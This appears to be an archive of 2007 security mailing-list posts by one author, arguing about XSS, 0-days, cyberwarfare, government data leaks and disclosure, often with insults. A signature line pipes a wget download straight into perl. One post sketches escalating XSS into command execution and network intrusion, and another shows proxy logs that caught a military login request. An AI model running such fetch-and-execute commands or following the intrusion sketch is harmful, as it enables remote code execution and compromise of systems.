Your email was constructive and much appreciated. We'll go over 
the review a second time and incorporate some of your suggestions. 
Thank you for taking the time to provide so much good feedback.




Hey all, I'd like to get into reviewing security companies as well.
Before I do though I'd appreciate it if someone could provide me
with information on the differences between statistical sampling
over judgmental sampling. I wouldn't want to write a review that
could affect someone's livelihood without knowing what the differences 
are between say change management and mitigation management.


And to the older security folks on the list keeping quiet (not those 
between the ages of tenteen and 19):


eW91IGNhbiBwYXkgdXMgdG8gd2hvcmUgeW91ciBjb21wYW55Cg==

Cheap too!



--

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

wget -qO - www.infiltrated.net/sig|perl

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] on xss and its technical merit

2007-12-12 Thread J. Oquendo
Byron Sonne wrote:

 In terms of a technically interesting challenge, it sounds about as
 exciting as picking fights with 10 year olds. Shit man, most of this
 stuff is more about fooling people than anything. Yawn. I was bored
 tricking or weaseling passwords out of datacentre employees over the
 phone 20 years ago. Now I'm supposed to get excited 'cos some retards
 are doing it over the web?

I agree to an extent however I do know some pretty skillful people on
all sorts of levels use xss in conjunction with leveraging a network.

 A safe assumption. In fact, if it's on the web, it's a safe assumption
 it's crap anyways. Or is that Crap2.0?

What's that old adage on assume. Forward facing sites can be
leveraged to disclose other information. E.g., Write an XSS to run
commands on the system itself for say a week. Eventually you will see
signs of someone logging into said system. Construct an XSS attack to
embed the necessary tools to leverage your way into the backbone. Not
unlikely a difficult thing to do considering you managed to XSS attack
the site in the first place.

What you/we see too often on this and other mailing list is stupidity
a-la I just XSS and popup up w00t now give me credit! That is not what
I consider a hack I consider it stupidity. What would have impressed me
would be someone using a curl POST with a proxy, dumping binaries and
having those binaries run with the user privileges of the webserver. One
misconfigured webserver (chown -Rf root:wheel) and it's a wrap.


-- 

J. Oquendo

SGFA #579 (FW+VPN v4.1)
SGFE #574 (FW+VPN v4.1)

I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent. Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] mac trojan in-the-wild

2007-11-02 Thread J. Oquendo
Dude VanWinkle wrote:

 A program installed under false pretenses that will give the
 author/distributer remote access to the victim machines.

Right... Guess those local are not a threat.

 -JP

Vranisaprick is that you


-- 

J. Oquendo

SGFA (FW+VPN v4.1)
SGFE (FW+VPN v4.1)

I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent. Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] Spike in SSH scans

2007-10-22 Thread J. Oquendo
Adrian wrote:
 Yeah, some of those ips also tried to login on my server as 'mysql' and
 'root'.
 Even my university is part of that crappy botnet. :x
 
 

http://atlas.arbor.net/service/tcp/22 +66.0 % as of yesterday.

-- 

J. Oquendo

SGFA (FW+VPN v4.1)
SGFE (FW+VPN v4.1)

I hear much of people's calling out to punish the
guilty, but very few are concerned to clear the
innocent. Daniel Defoe

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E




Re: [Full-disclosure] New term RDV is born

2007-09-28 Thread J. Oquendo
[EMAIL PROTECTED] wrote:

 Two months is still recently. Think about In recent history we invaded
 Iraq, In recent times terrorism has become more prominent.

 The real problem here is that 0-day originally meant previously undisclosed
 vulnerability/exploit.  The term lost its usefulness when all the hacker
 wannabe's started posting I found a 0-day, when what they really had was
 a *yawn*-we've-been-waiting-18-months-for-vendor-to-fix-day.

Which reminds me, I recently found a vulnerability on all open source
based systems. Seems like whenever there is a program called sudo
installed on the machine - any user can run a command with root
privileges on that machine if sudo is properly configured to allow the
user to do so.

#!/bin/sh
# sudUmb

echo pwnd
sudo shutdown now

# insert one million shout outs to etards here



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-25 Thread J. Oquendo
Crispin Cowan wrote:


 This is a perfectly viable way to produce what amounts to Internet
 munitions. The recent incident of Estonia Under *Russian Cyber Attack*?
 http://www.internetnews.com/security/article.php/3678606 is an example
 of such a network brush war in which possession of such an arsenal would
 be very useful.

 Crispin

One would presume that governments across the world would have their
shares of unpublished exploits but with all the incidences of government
networks being compromised, I don't believe this to be the case. What
happened in Estonia though was nothing more than a botnet attack on
their infrastructure
(http://www.informationweek.com/showArticle.jhtml?articleID=199602023)
not an 0day attack.

0day's defined as unpublished exploit wouldn't do much in a
cyberwarfare theater as country against country as the purpose of such
warfare would LIKELY be to disconnect/disrupt communications. In the
cases of industrial/country vs. country espionage it might (likely)
be more effective for the long haul but in the short term, 0days will
be useless in this type of cyberfight. Think about it logically, you
want to disrupt country X's communications, not tap them. You'd want
to make sure their physical army had no mechanism to communicate. You'd
want to make sure financially you would cripple them. Not worry about
injecting some crapware onto a machine for the sake of seeing what they're
doing.

Reconnaissance is usually something done beforehand to mitigate your
strategy. Not mitigate what's happening after you possibly sent 1Gb of
traffic down a 100Mb pipe.



-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-25 Thread J. Oquendo
Jason wrote:

 You present a valid position but fall short of seeing the whole picture.

 As an attacker, nation state or otherwise, my goal being to cripple
 communications, 0day is the way to go. Resource exhaustion takes
 resources, something the 0day can deprive the enemy of.

Counterpoint... You're trying to shoot me down with 0day crap:

You -- 0day attack -- My Infrastructure

Me -- Botnet -- Your infrastructure

Never having to consume any resources other than a point and click shoot
em up attack, I necessarily won't even have to use my own resources. So
shoot away as your network becomes saturated.

 Knocking out infrastructure with attacks is a far more effective
 strategy. You can control its timing, launch it with minimal resources,
 from anywhere, coordinate it, and be gone before it can be thwarted. The
 botnet would only serve as cover while the real attack happens.

In a strategic war, most countries aim to eliminate supply points and
mission critical infrastructure as quickly as possible. In a
cyberwarfare situation me personally, I would aim to 1) disrupt/stop via
a coordinated attack whether it's via a botnet or something perhaps along
the lines of a physical cut to a nation's fiber lines.

0day would only serve me afterwards to perhaps maintain covert states of
communication. Maybe inject disinformation through crapaganda. Imagine
an enemy's entire website infrastructure showing tailored news... Would
truly serve a purpose AFTER the attack not during.

 I am more inclined to believe that botnets in use today really only
 serve as cover, thuggish retribution, and extortion tools, not as
 effective tools of warfare. No real warfare threat would risk exposing
 themselves through the use of or construction of a botnet.
 

Luckily for most companies and government, botnets aren't being used for
their full potential. And I don't mean potential as in they're a good
thing. I could think up a dozen cyberwar scenarios in minutes that
would cripple countries and businesses. I believe countries, providers
and governments should at some point get the picture and perhaps create
guidelines to curtail the potential for havoc - imagine hospitals being
attacked and mission critical life saving technologies taken offline.



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] 0day: PDF pwns Windows

2007-09-21 Thread J. Oquendo
[EMAIL PROTECTED] wrote:

 But a 0 day vulnerability is meaningless as a definition; it applies to
 a vulnerability for exactly 24 hours and then is meaningless.  ALL 
 vulnerabilities were discovered at some point and had their 24 hours of
 0 day fame by your definition.  It just does not make sense.
 
 Casper
 

Should we now create a new term for the industry +0day or 1day. How
about? nowaday

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] [Mlabs] Scrutinising SIP Payloads - Someone break his e-kneecaps please

2007-09-20 Thread J. Oquendo
First of all you should credit ALL the individuals, companies and sites
you rip your information from else it's called plagiarism

On Page 12. Word for word you simply copied:
http://www.cisco.com/en/US/docs/voice_ip_comm/sip/proxies/2.0/release/notes/stnSolRn.html

Temper the contents and make it work according to attackers usage.
What the hell are you talking about...

You stated The Cisco proxy server does not accept calls after 150 cps
I don't know what the hell you were using but Netra's can easily push in
upwards of CPS, IBM X's 1000 via udp, 200+ via tcp...

On Page 19 you stated Wiretapping Attacks: These are the generic class
of attacks which take place when modification of communication channel
is done by an attacker between two parties. ... Really? So when I'm
running VoIPong and nothing is getting modified yet I'm steady
recording a conversation what is this called. An unmodified wiretapping
attack.

That paper was yet another waste of time for me to read. Instead of
copying and pasting to your hearts content and putting together
something that makes sense only to you, why don't you first try to
understand 1) what the hell you're talking about 2) what the hell you're
writing about 3) what the protocol truly does and then - what attacks
are possible based on something you truly know - as opposed to something
you may think sounds logical.

Page 28: It can be exploited by the attackers to have Denial of service
attacks. The mechanism starts from the payload designing. The actual
infection starts or is mainly coded in the payload itself by the
attackers. What kind of high potent hashish are you smoking?

Outside of these ignorant assumptions you make based on what I infer as
an overall lack of knowledge on the subject, I could barely skim through
the rest of your document since it was mainly terrible English with huge
chunks of copied RFC material and ramblings that made zero sense.
Nothing worth noting - other than me repeating in my head this jackass
should STFU and learn what he's talking about instead of making an idiot
out of himself

And I don't mean to sound harsh - well yea I do, but that's irrelevant.
What you're doing is flooding the industry with bullshit documents that
those without a clue might read and become even more clueless. Please
stop your ramblings.


J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] Symantec Contact?

2007-09-18 Thread J. Oquendo
 What's really Sad is that Symantec does not have an option for the
 general public (i.e. Independent Virus Researchers) to submit virus
 samples .

 You have to either
 A. Submit it through their product.
 B. Have a Corporate Support contract.

 Guess they don't want new samples.

On the devil's advocate side, maybe they don't have it since it would be
trivial for a virus creator to flood them with bogus information. It's
easy to point a finger and say shame shame shame on you guys. You guys
blow, foobar, cry, but I've yet to have an instance where I was looking
for a point of contact at a vendor and not found one.

Most times I get the impression the (l)user on the mailing list
disclosing sends out one email knowing damn well the ratio for a
response will be low - especially when a response was sent to abuse or
contact or some other generic account. They then run along to a
mailing list(s) then cry foul Vendor absent. Typical nowadays when
many that I've seen come and go never learning much other than how to be
a PACH. (buzzword - Point And Click Hacker).



-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] Pro US government hackerganda

2007-09-18 Thread J. Oquendo
jf wrote:
 Well either you're full of it, they're full of it, or you just plainly
 misunderstood. In every place I've ever seen TS data getting transmitted,
 they're not using any cipher you've ever heard of, both ends of the
 connection use something like a kg-175 (now known as a taclane, your lie
 would've been better if you had found out about these in your time spent
 using google), which uses NSA encryption and because of the crypto-module,
 is classified.

Oh right every single department in the government and agency has one
along with with kiv-19's because after all everyone connects back to
DREN. Right I forgot it's all over TRADOC manuals. How stupid can I be to
not know this
(http://web.archive.org/web/*/http://venona.antioffline.com) my bad.

 Now what's possible (assuming this isnt the figment of your imagination),
 is that they were transmitting data rated at secret, which IIRC can use
 AES 128, depending on the implementation.

 So like I said, you're either making it up, misunderstood them, or they
 were having fun with you.

No they were deathly serious about using EV-DO to transmit Top Secret
documents over the wire and wanted to know it was sniffable period.

 So what, you think because you found some documents on google that this is
 how the data is getting lost and this all somehow makes you authoritative?
 Here is the simple truth, as is the usual with many of you
 ex-feed-the-goats/etc kids, you just don't know wtf you're talking about.

Documents on Google? One in the government shouldn't be worried about
documents on Google they should be worried about idiots behind some of
those government machines which leave information not intended for the
public on them. [1]

I recall back in the mid to late 90's mirrors of dozens maybe hundreds
of military, NASA sites left and right getting pwnd daily, hourly. Why
these machines were up and on the Internet is anyone's guess from the
public side. As to why someone would compromise them, the answer should
be obvious to anyone with half a clue.

It's alright to vent your frustration but I'm not the idiot putting up
machines on the Internet when they shouldn't be there. I'm not the one
who's allowing idiots to post classified information over non secure
channels when they should know better. Facts are facts. Don't shoot the
messenger:

// begin
[1] Numerous US military documents, some of which have critical
strategic importance, have been found on publicly accessible ftp
servers. ... Some of the most sensitive information found by AP included
details of security vulnerabilities at a contingency operating base,
security features at Tallil Air Base and plans of a military fuelling
facility. Some files were apparently password protected, but in one case
the password was given in another document on the same server.

When asked for his views, Bruce Schneier called the leaks a sloppy user
mistake - an understatement of monumental proportions ...
http://www.heise-security.co.uk/news/92653
// end

Some files were apparently password protected, but in one case the
password was given in another document on the same server. What's that
you were saying about stupidity?

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




[Full-disclosure] RFP Interview

2007-09-17 Thread J. Oquendo
The legend behind responsible full (responsible) disclosure - something
which so many retards new to the industry have yet to learn - answered
some qa's for those interested. Mainly for those more in tuned with
full disclosure not fool disclosure.

http://www.infiltrated.net/?p=25



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] Pro US government hackerganda

2007-09-14 Thread J. Oquendo

 You're suffering from a logical fallacy, I worked in that arena (albeit
 it a different agency) in incident response for quite some time

Nice to know. I hope my government can either install ispell or send
some of you guys to Clueful University.

 of workstations and servers on a regular basis and downloaded
 everything that ended in extensions like .pdf, .eml, .doc, et cetera,
 it wouldn't take that long to get up to very high numbers. This is
 exactly what has occurred and makes your assertion that of ignorance
 and presumption.

So again, look at the statement from the previous article where the boys
from this gov state NIPR. Translation? Shit anyone can find on
Google.com/unclesam


 You again fall victim to foolish ignorance and presumption, just
 because a red network isn't connected, doesn't mean a yellow network
 isn't. I can't speak for DoD in that sense, I just know how it works
 in other agencies.

I just know how it works in other agencies Not knowing, isn't this
the same quote unquote ignorance you accused me of. If you don't know I
would Google STFU if you haven't already heard/been told the term.

 Furthermore, with ratings like SBU/et cetera, and lots of it, you can
 gain valuable intelligence by combining all of it.

Irrelevant to what the government has stated. China has hacked
TERABYTES OF DATA ... Define hacked. Google hacked? How about gov
employees get a clue before they decide to leave top secret information
on a non secure webserver.

Here is one for you from the horse's mouth. 100% true so help me any
deity. So I get a group of individuals visit my company about two weeks
ago. Golf shirts slacks, etc., really clean cut. Nice little blue and
white plates can be seen from the conference room with a big old G on
it. They start asking about pentesting EV-DO... They ramble on and
mention we're using 128 bit...

Wait a minute I told the gentleman. You know you shouldn't be using
128 bit for encryption of TS documents in accordance with NIST. (And I
know this because I got a personal schooling from Bruce Schneier on
this. (http://www.cnss.gov/Assets/pdf/cnssp_15_fs.pdf for clarity on
this)) Their response: We know but we have M16's on each side of the
stream and they chuckled.

My thoughts at that time... What a bunch of idiots. So what. M16's mean
nothing if you can't track someone sniffing you - you idiot... In
essence it's stupid - and I sincerely and obnoxiously mean this - STUPID
IDIOTS in the government who allow these so called pseudoIntrusions
(add that to your buzzwords too).

See an intrusion hasn't occurred here period, error and human stupidity
has though and now the US government is calling the kettle black. In
case you have either forgotten or never heard of the abuses of ECHELON
not to even bother pointing out the mess we have in this country with
our warrantless MM color coded uberDuber terrorAlert crapaganda systems.

So politics aside, it's stupidity black and white, not an intrusion that
is leading to the compromise of data. If the data is on unsecured
webservers that are on the Internet, don't blame the ingenuity of
someone for finding something that should have been on SIPR instead of
being online (NIPR) to the public in the first place.

The gov should re-iterate the differences between SIPR, NIPR, RIPR and
other systems to clueless idiots on computers, servers, crackberries or
whatever other mediums they choose to use.



-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] Pro US government hackerganda

2007-09-14 Thread J. Oquendo
lostzero wrote:
 You're looking at it from the wrong view.  The 20 terabytes didn't happen
 overnight.  Without a starting time frame you have no idea how many years
 it has been happening.  Not to mention they have workstations and servers
 all over the world.  Which means no 1 agency or individual looks at all the
 traffic from all the locations at the same time.  If your network produced
 terabytes of traffic a day, 50-100mb isn't that eye catching.

Again many of you seem to be missing the bottom line here... oh noes
deesa been from a many machines massa. Irrelevant. If someone is coming
into a GOVERNMENT AGENCY those machines with classified information
should be LOGGING and those LOGS should be MONITORED as per GOVERNMENT
rules. So whatever someone feels should have could have would have is
all irrelevant. There are rules set up for those in office to follow.
They're not being followed. Start threatening some of these people with
penalties I guarantee you that lazy ass SMSGT won't decide Gee... I
think I'll put this Top Secret document on a public webserver so I can
see it later from home... won't occur.


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




[Full-disclosure] Pro US government hackerganda

2007-09-13 Thread J. Oquendo
Robert Lemos wrote:

 In this case, without judging how truthful the Chinese are being

Hackerganda... Buzzword? Who cares. Lets play Politrix, here goes...

China has downloaded 10 to 20 terabytes of data... said Maj. Gen.
William Lord, director of information, services and integration in the
Air Force’s Office of Warfighting Integration and Chief Information
Officer, during the recent Air Force IT Conference in Montgomery, Ala.
(http://www.computerworld.com/blogs/node/3320)

1) 10 - 20 terabytes? Undetected? What a marvelous feat. What kind of
connection did they have to do this without being detected since they
obviously went undetected for at minimum, 10 terabytes of data
according to this quote. Who was watching logs? Were they asleep at the
wheel too a-la 9/11 pseudointelligence agencies. Maybe China borrowed
Peter Lothberg's mother's backbone to do this
(http://slashdot.org/articles/07/07/12/1236231.shtml)

2) Notice how the remainder of the quote was left off? Here it is in
full: “China has downloaded 10 to 20 terabytes of data from the NIPRNet
(DOD’s Non-Classified IP Router Network),”  Funny NIPRnet is unimportant
information in fact a majority of it can be found via
www.google.com/unclesam


Outside of this play on words in all honesty if the US government gets
its information stolen then they deserve it. What the hell am I paying
uber taxes for outside of the War in Vietnam2k.

Here is a story since people will make what they want out of it. Story
goes, a friend was talking to another friend who happened to be a
platoon leader in Iraq. The military friend spoke in angst to his friend
because his squadron was sending out orders to each other pre-tour via
hotmail and IM. Secret, Top Secret information... All went out via non
secure channels. How's that for security.

How about those moronic diplomats who confused anonymity with security
and were logging into their email accounts with a tor proxy. Hrmm...


torny# whoami
root
torny# cd /usr/local/squid/logs/
torny# ls -ltha cache.log
-rw-r-  1 squid  squid40K Sep  6 09:49 cache.log
torny# ls -ltha store.log
-rw-r-  1 squid  squid   602K Sep 13 11:16 store.log
torny# tail -n 2 store.log
1189611525.071 RELEASE -1  B8721ECBA84E697E3D431CC57BEF9972  200
1189611784-1-1 text/plain -1/138 GET
http://www.google.com/tools/swg2/update?
1189700157.679 RELEASE -1  28228FB9480AEE7916FD738A209C6027  200
1189700417-1-1 text/plain -1/138 GET
http://www.google.com/tools/swg2/update?

Funny thing is I leave this opened purposely as part of a honeypot.
Never have I used my squid proxy server but guess what:

torny# grep login store.log
1187186702.458 RELEASE -1  0EE6D49B3E4BA072166EBF15AAF26ABE  200
1187187634-1 375007920 text/html 599/599 POST
http://xxx.x.mil/mail/login.asp

Wait... Am I running an [EMAIL PROTECTED]@%$ ... The government needs to get
their stuff together period. As for the hey chinese hax0red our
google.gov toolbar ... no USA hacker Chinese Great Steamed Dumplings
BS its all political chess. If the US truly wanted to stop it they COULD
(note the word COULD), question should be do they really want to or are
they (the US) simply filling these vulnerable machines with honeypot
garbage material.


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net





Re: [Full-disclosure] Came across this site

2007-09-10 Thread J. Oquendo
Brian Toovey wrote:

 At the risk of getting flamed...

At the risk of cry babies whining I shall chime in.

Oct 2007 Infiltrated dot net will take off where I left AntiOffline off
in 2001. After reading so many shitty websites with distorted views of
security in general, I decided to bring back the In Your Face news and
Interviews of yestermillenium.

It won't be geared towards luzer assed look at me grep -i passwd
*.php|echo l33t [EMAIL PROTECTED] but more towards
interviews with people I find make the security scene worthwhile. My own
personal, obnoxious, clueless ramblings, and outtakes on security in general.

For those on the scene pre-2001 keep on the look out for a top ten
questionnaire coming to your mailboxes. For those under the age of
tenteen, still in high school, freshmen/sophomores in college and romper
room kiddiots keep away.

Stay tuned.



J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] World's most powerful supercomputer goesonline (fwd)

2007-09-03 Thread J. Oquendo
[EMAIL PROTECTED] wrote:

 Uh... I think you're missing some key
 points about the gov't and the internet. 
 First off, all methods of connecting to
 the internet (cable, DSL, etc) invariably
 fall under the control of the FCC.

Oh really all of the methods. Including those
outside of the jurisdiction of United States
laws. This is certainly news to me and I'm
sure it's also news to many other persons and
countries outside of the United States.

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net 



Re: [Full-disclosure] Interesting fun with Cisco VPN Client Privilege Escalation Vulnerabilities

2007-08-16 Thread J. Oquendo
James Lay wrote:

> You'll need a LOT more then just the site and serial number...you'll need to
> be registered with Cisco or provide them with:
>
> REQUIRED INFORMATION
>
> * CONTACT NAME:
> * CONTACT PHONE NUMBER:
> * CONTACT CISCO.COM USERID (if one exists):
> * CONTACT EMAIL ADDRESS:
> * CONTRACT #:
> * SERIAL #:
> * PRODUCT TYPE (Model Number):
> * SOFTWARE VERSION:
> * COMPANY NAME:
> * EQUIPMENT LOCATION (Address):
> * BRIEF PROBLEM DESCRIPTION:

And? The problem is what? I've had firmware upgrades done via the TAC
without a contract before. I've had firmware updates done via the TAC on
stuff I bought from eBay too. Pain in the ass, yes; impossible, no. Might
take a little gift of gab, but I can tell you I've gotten what I needed
when I needed it and I have enough Cisco crap lying around to disprove
this message the world over. (http://www.infiltrated.net/rewired/ not
even up-to-date at this point)

> The product that you requested support for is an older product that has
> passed the warranty period date for that product.  Once a product becomes
> End of Sale, it is supported for three years
> beyond the End of Sale date and then becomes End of Support.

End of Support is self-explanatory. Do you expect any vendor to go
backwards? What incentives do they have to do so? It would be more
costly for most to do so; use some common sense, it's not like they will
have product X still being sold by a re-seller to support it. They gave
you X amount of time notice that X product is at the EOS stage, then
told you, look, it's EOS but we'll still deal with it for 3 years after
that. Plan ahead.


> The last gig is:
>
> The Cisco VPN Client for Windows is available for download from the
> following location on cisco.com:
>
> http://www.cisco.com/pcgi-bin/tablebuild.pl/windows?psrtdcat20e2
>
> Heh..nothing there.
>
> Interesting...VERY interesting ;)

Apparently you had difficulty reading (or including) the entire print:

http://www.cisco.com/en/US/products/sw/secursw/ps2308/index.html

The Cisco VPN Client is included with all models of Cisco VPN 3000
Series concentrators and Cisco ASA 5500 Series security appliances
(excluding ASA 5505), and most Cisco PIX 500 security appliances.
Customers with Cisco SMARTnet® support contracts and encryption
entitlement may download the Cisco VPN Client from the Cisco Software
Center at no additional cost. For customers without Cisco SMARTnet
support contracts, a media CD containing the client software is
available for purchase. This CD does not provide access to the most
current patch releases.

Do you have a SMARTnet contract? If so, guess what, it's free to
download; if not, pay for the CD... No voodoo in those words. It would be a
different story had you posted "I logged in with my SMARTnet and there
is nothing there, what gives!" Anyway...

So how was this relevant to any form of full-disclosure, I ask, since it
puzzled me a little. Who knows, I just keep reminding myself of my
dyslexia (fool||full-disclosure), keeps me stable.

-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net





Re: [Full-disclosure] SecNiche : Microsoft Internet Explorer Pop up Blocker Bypassing and Dos Vulnerability

2007-08-15 Thread J. Oquendo
Aditya K Sood wrote:

> Embarrassment. Nothing lies beneath it. Critically your are too much at
> of your own in deciding.


Personally, this is just another kiddiot on my filters. I only see the
residue of responses to him. I believe every single advisory this
*person* (play nice now) has sent out has 1) never been verified 2)
never been worthwhile 3) repeat steps 1 and 2.

I plan to release some advisories myself too sometime this millennium. I
found that if you allowed these miserable posts to fill your mailbox,
your machine will fill up space... Then crash... And crashing is a bad
thing. Which is a DoS. Which is evil. Translation... Re-blocking APNIC
and RIPE ranges. Evil hackers out there. Pop Up blockers... Scare-e...
IE? I'm so owned as of last weekend months ago.


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net




Re: [Full-disclosure] intrusion kit

2007-08-03 Thread J. Oquendo
Joshua Tagnore wrote:

> unzip kit.zip
> cd nmap
> nmap -sS localhost
> cd ..
> cd vnc
> run-vnc-server
>
> Does this exist? Could anyone please share his experience with these
> problems?

I have one I will be throwing up for sale on eBay to the highest suc...
bidder. Not only will it do what you just asked for, but here is a
complete list of what it will do:

Detect and covertly bypass firewalls
Detect and covertly bypass infrared sensors
Detect and play cards with IPS/IDS'
Detect and remove Harry Potter related stolenware

And, if you act now and become the highest bidder, it will even let you
ǝlzzıu ɥɐɯ ǝlzzıɥs ʇǝǝɹǝ ɹǝdns ǝɯos op


-- 

J. Oquendo
Excusatio non petita, accusatio manifesta

http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0xF684C42E
sil . infiltrated @ net http://www.infiltrated.net





Re: [Full-disclosure] Wachovia Bank website sends confidential information

2007-07-11 Thread J. Oquendo

[EMAIL PROTECTED] wrote:

> On Tue, 10 Jul 2007 21:39:33 EDT, Jim Popovitch said:
>
>> 7 days?   industry practice?   Come on Bob I know you know that large
>> corporations can't feed a cat in 7 days let alone make unscheduled
>> website changes that fast.  Change control approvals alone would include
>> 14 or more days in most enterprises.   Why the rush to say so?
>
> On the other hand, I think that they *could* manage at least a Wow d00dz, we
> really *do* have a hole there reply and at least give a handwaving about
> when they'd fix it.  Of course, actually *fixing* a design flaw that big
> is going to take them *months*.


Driver walks into a dealer and speaks to customer service:

"These brake pads are extremely vulnerable to slipping during X
conditions on a 90 degree slalom," says the driver. Puzzled and
not knowing squat about slaloms, or the braking system, the
customer service rep sends the driver to a mechanic.

"These brake pads are extremely vulnerable to slipping during X
conditions on a 90 degree slalom. Someone will die!" says the
driver to the mechanic... Not being able to change the auto's
design nor engineering, the mechanic is puzzled and offers to
take the information although he is even more puzzled on who
this should be directed to.

Two days later the driver rambles on news stations nationwide:
"Their arrogance will get people killed. I warned them repeatedly!"
People moan and grumble, etc., recalls, fixes...

This Wachovia thread is pointless. I see no mention or posting
to perhaps any security list (and I'm on many, both public and
private) saying: "Hey, is there anyone who can put me in touch
with someone in the know at Wachovia?" on any list. All I see
is... "I called customer service." So what? If you're a security
professional you will know damn well you're getting nowhere
with them. "I spoke to their w3bm4ster." And? Either the poster
is looking for attention or a complete and utter idiot. If his
or her true intention was to provide a report of a security
woe concerning said business or product, he or she could have
easily jumped on any security mailing list and found the right
connection instead of rambling on "the sky is falling"...

Let me see:
wachovia security cissp incident +network via Google

This looks interesting:
http://www.bryceporter.com/

I would have contacted someone on this level to put me in
touch with the right person. But hey, guess it's more hip
to add stupid little tags next to your resume or webpage:
"I broke $INSERT_VENDOR_HERE"




--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] Wachovia Bank website sends confidential information

2007-07-11 Thread J. Oquendo

Bob Bruen wrote:
> While it is true that lots of folk pick on vendors for a few minutes of
> fame, the Wachovia case is slightly different.
>
> They do have an attitude problem and are technically challenged. The basis
> for this is a law enforcement conference about six months ago. During a
> presentation a Wachovia representative told a speaker to stop blaming the
> banks for problems. This was the third presentation this individual has
> listened to in which each speaker had blamed the banks for not doing
> enough and the frustration level was a bit high.
>
> This only comes up because of the current Wachovia web site issue. It
> shows that there is an internal problem, worse than most, ending with the
> current situation. And no I will not identify any of the players.
>
> --bob


Mechanisms of politrix... I was doing contract work from home for a
HUGE-O-MONGOUS tech company I won't name (NDA) and was assigned to
do fw administration and configuration for a bank that outsourced it to
this HUGE-O-MONGOUS monster. When we needed to implement a change
these were the steps:

Uh oh.. We're seeing attacks from network X ...

1) Call manager
2) Manager calls his manager in another state
3) That manager calls sales rep
4) Sales rep called the bank's contact
5) Bank's contact called his security team
6) Hey security team, you need to speak with your contractors
7) Security team to bank's contact ok make a conference call
8) Bank's contact to the sales rep - ok make a conference call
9) bank sales rep to HUGE-O-MONGOUS' sales rep - ok make a conference call
10) manager to manager - hey we're going to do a conference call
11) No wait... My contractor is tied up... Can we re-schedule?

In essence, when we needed to do things, it wasn't as cut and
dry as I thought it would be. In fact it was downright frustrating.
Here you are Rainwall open, NSM open about to fire off changes
but have to wait for at minimum 4 business days hoping no one
up the food chain was unavailable to make a mission critical
change.

Long story short, while at HUGE-O-MONGOUS I was surprised I
was even given the opportunity to be there - but hey contractors
liabilities, etc., legal foobarfoo wording exculpated HUGE-O-MONGOUS
company from the whole shmoo (compsec historians know the HIStory),
anyhow, I got frustrated working for them. I felt as if it was
such a dead end. Mind you I was making about $80.00 per hour
to roll out of bed and do work pretty much whenever I wanted.

Sometimes, things aren't as clear cut as one may think they are.
To me the initial Oh noes! Wachovia is evil post was nothing
more than someone itching for their Andy Warhol 15 minutes. With
that said... Off to lunch...


--

J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
echo infiltrated.net|sed 's/^/sil@/g' 


Wise men talk because they have something to say;
fools, because they have to say something. -- Plato





Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

2007-07-03 Thread J. Oquendo

